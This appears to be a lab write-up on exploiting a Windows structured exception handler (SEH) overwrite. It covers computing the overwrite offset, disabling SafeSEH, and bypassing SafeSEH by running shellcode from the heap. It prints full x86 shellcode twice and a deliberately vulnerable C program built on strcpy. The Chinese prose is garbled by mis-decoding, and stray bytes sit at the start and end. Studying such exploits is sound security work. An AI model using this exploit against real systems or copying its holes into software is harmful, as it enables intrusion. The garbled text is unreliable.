I"§%<p>и·ҹеҲ°mainйҮҢеҸ‘зҺ°mainйҮҢзҡ„SHEиҠӮзӮ№е·Із»ҸеҲқе§ӢеҢ–
<img src="https://i.imgur.com/I7wUmgB.png" alt="p1" />
йҮҚеҗҜзЁӢеәҸжүҫеҲ°еҲқе§ӢеҢ–mainзҡ„SHEиҠӮзӮ№зҡ„еҮҪж•°
<img src="https://i.imgur.com/Gk37fQ8.png" alt="p2" />
иҝӣе…ҘtestеҮҪж•°зҡ„SHEиҠӮзӮ№еҲқе§ӢеҢ–
<img src="https://i.imgur.com/5jhJeCA.png" alt="p3" />
и§ҰеҸ‘ж–ӯзӮ№еҗҺеҸҜд»ҘзңӢи§Ғeipи·іеҲ°дәҶtestеҮҪж•°зҡ„SEеӨ„зҗҶеҮҪж•°(е№¶дё”еңЁи·іиҝҮеҺ»зҡ„иҝҮзЁӢдёӯеҸҲеҲӣе»әдәҶдёҖдёӘиҠӮзӮ№)
<img src="https://i.imgur.com/AOUuNfP.png" alt="p4" />
иҝӣе…Ҙvcruntim, еҫҖдёӢжүҫеҲ°иҺ·еҸ–ејӮеёёеӨ„зҗҶеҮҪж•°ең°еқҖзҡ„дҪҚзҪ®
<img src="https://i.imgur.com/gfi0qtw.png" alt="p5" /></p>

<p>еӣһеҲ°strcpyеӨ„, и®Ўз®—bufеҸҳйҮҸеҲ°SEHиҠӮзӮ№(дҝқеӯҳеӨ„зҗҶеҮҪж•°зҡ„ең°еқҖеӨ„)зҡ„зӣёеҜ№еҒҸз§»(==0xd8)
иҰҶзӣ–жҲҗеҠҹ
<img src="https://i.imgur.com/rJaXdAe.png" alt="p6" /></p>

<hr />

<h2 id="еҹәжң¬жөҒзЁӢжўізҗҶжё…жҘҡдәҶ-е°қиҜ•иҰҶзӣ–еҮҪж•°ең°еқҖ">еҹәжң¬жөҒзЁӢжўізҗҶжё…жҘҡдәҶ е°қиҜ•иҰҶзӣ–еҮҪж•°ең°еқҖ</h2>

<p>vs2019е…ій—ӯSAFESEH
<img src="https://i.imgur.com/RykRJai.png" alt="p7" /></p>

<p>зЁӢеәҸж— жі•и·іеҲ°ж ҲдёҠжү§иЎҢ(жЈҖжҹҘдәҶзӣ®ж Үең°еқҖжҳҜеҗҰеңЁж ҲеҶ…)
<img src="https://i.imgur.com/ZxlWx3I.png" alt="p9" />
жүҖд»ҘйҮҮз”ЁзӣҙжҺҘи·іеҲ°е…ЁеұҖеҸҳйҮҸshellcode(0x403018)еӨ„жү§иЎҢ
<img src="https://i.imgur.com/u23y1UO.png" alt="p8" />
shellcode:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\xbb\x33\x32\x53</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x68\x75\x73\x65\x72\x54\x33\xd2\x64\x8b\x5a\x30\x8b\x4b\x0c\x8b</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x49\x1c\x8b\x09\x8b\x69\x08\xad\x3d\x6a\x0a\x38\x1e\x75\x05\x95</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xff\x57\xf8\x95\x60\x8b\x45\x3c\x8b\x4c\x05\x78\x03\xcd\x8b\x59</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x20\x03\xdd\x33\xff\x47\x8b\x34\xbb\x03\xf5\x99\x0f\xbe\x06\x3a</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc4\x74\x08\xc1\xca\x07\x03\xd0\x46\xeb\xf1\x3b\x54\x24\x1c\x75</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xe4\x8b\x59\x24\x03\xdd\x66\x8b\x3c\x7b\x8b\x59\x1c\x03\xdd\x03</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x2c\xbb\x95\x5f\xab\x57\x61\x3d\x6a\x0a\x38\x1e\x75\xa9\x33\xdb</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6c\x8b\xc4\x53\x50\x50</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x53\xff\x57\xfc\x53\xff\x57\xf8\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90\x18\x30\x40\x00</span><span class="s">"</span>
</code></pre></div></div>

<p>еқ‘:</p>

<ol>
  <li>д№ӢеүҚз”ЁдәҶDEBUGзүҲжң¬, еҸ‘зҺ°eipе№¶дёҚиғҪи·іеҲ°жҢҮе®ҡдҪҚзҪ®, зЁӢеәҸеңЁејҖе§ӢеӨ„зҗҶејӮеёёеҗҺдјҡеҚЎжӯ», зҢңжөӢжҳҜиҝӣиЎҢдәҶжЈҖжҹҘ</li>
  <li>зЁӢеәҸжІЎжңүи§ҰеҸ‘ејӮеёё, еҸ‘зҺ°жҳҜshellcodeжҠҠеҸҳйҮҸzeroзҡ„еҖјз»ҷиҰҶзӣ–жҲҗдәҶ0x90909090, з„¶еҗҺжҠҠshellcodeеҜ№еә”дҪҚзҪ®ж”№жҲҗ\x00еҗҺеҸ‘зҺ°strcpyдјҡжҲӘж–ӯ\x00еҗҺзҡ„еҶ…е®№, жүҖд»ҘеңЁstrcpyеҗҺйҮҚж–°з»ҷzeroйҮҚж–°иөӢ0еҖј(зҺҜеўғдёҚеҗҢ, зј–иҜ‘еҮәзҡ„з»“жһңдёҚеҗҢ)</li>
</ol>

<hr />

<p>ејҖеҗҜsafeSEH</p>

<p>з»•иҝҮsafeSEHзҡ„ж–№жі•иҝҳжҳҜжҢәеӨҡзҡ„</p>

<p>иҝҷйҮҢеҲ©з”Ёе Ҷз»•иҝҮ</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt;
#include &lt;Windows.h&gt;
</span>
<span class="kt">char</span> <span class="n">shellCode</span><span class="p">[]</span> <span class="o">=</span> 
<span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\xbb\x33\x32\x53</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x68\x75\x73\x65\x72\x54\x33\xd2\x64\x8b\x5a\x30\x8b\x4b\x0c\x8b</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x49\x1c\x8b\x09\x8b\x69\x08\xad\x3d\x6a\x0a\x38\x1e\x75\x05\x95</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xff\x57\xf8\x95\x60\x8b\x45\x3c\x8b\x4c\x05\x78\x03\xcd\x8b\x59</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x20\x03\xdd\x33\xff\x47\x8b\x34\xbb\x03\xf5\x99\x0f\xbe\x06\x3a</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc4\x74\x08\xc1\xca\x07\x03\xd0\x46\xeb\xf1\x3b\x54\x24\x1c\x75</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xe4\x8b\x59\x24\x03\xdd\x66\x8b\x3c\x7b\x8b\x59\x1c\x03\xdd\x03</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x2c\xbb\x95\x5f\xab\x57\x61\x3d\x6a\x0a\x38\x1e\x75\xa9\x33\xdb</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6c\x8b\xc4\x53\x50\x50</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x53\xff\x57\xfc\x53\xff\x57\xf8\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90\x18\x30\x40\x00</span><span class="s">"</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">jumpCode</span><span class="p">[]</span> <span class="o">=</span>
<span class="s">"aaaaaaaaaaaaa</span><span class="se">\xaa\xbb\xcc\xdd</span><span class="s">"</span><span class="p">;</span>

<span class="n">DWORD</span> <span class="nf">myExceptionHandler</span><span class="p">()</span>
<span class="p">{</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"Got an exception!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">getchar</span><span class="p">();</span>
	<span class="n">ExitProcess</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">test</span><span class="p">(</span><span class="kt">char</span><span class="o">*</span> <span class="n">input</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span>
	<span class="n">buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mi">222</span><span class="p">);</span> 
	<span class="kt">char</span> <span class="n">buf2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">zero</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="kr">__try</span>
	<span class="p">{</span>
		<span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">input</span><span class="p">);</span>
		<span class="n">strcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf2</span><span class="p">,</span> <span class="n">jumpCode</span><span class="p">);</span>
		<span class="n">strcpy</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">buf2</span> <span class="o">+</span> <span class="mi">13</span><span class="p">),</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span> <span class="n">buf</span><span class="p">);</span>
		<span class="n">zero</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">zero</span> <span class="o">=</span> <span class="mi">4</span> <span class="o">/</span> <span class="n">zero</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="kr">__except</span> <span class="p">(</span><span class="n">myExceptionHandler</span><span class="p">())</span> <span class="p">{};</span>
<span class="p">}</span>


<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"main!!!!"</span><span class="p">);</span>
	<span class="n">test</span><span class="p">(</span><span class="n">shellCode</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>

<p>shellCodeеҶ…е®№зӣёеҗҢ, жү§иЎҢзҡ„дҪҚзҪ®д»Һе…ЁеұҖеҸҳйҮҸеҢәеҲ°дәҶе ҶеҢә(safeSHEе…Ғи®ёеңЁе ҶдёҠжү§иЎҢ)</p>

<p>jumpCodeиҰҶзӣ–еӨ„зҗҶејӮеёёзҡ„еҮҪж•°зҡ„ең°еқҖ</p>
:ET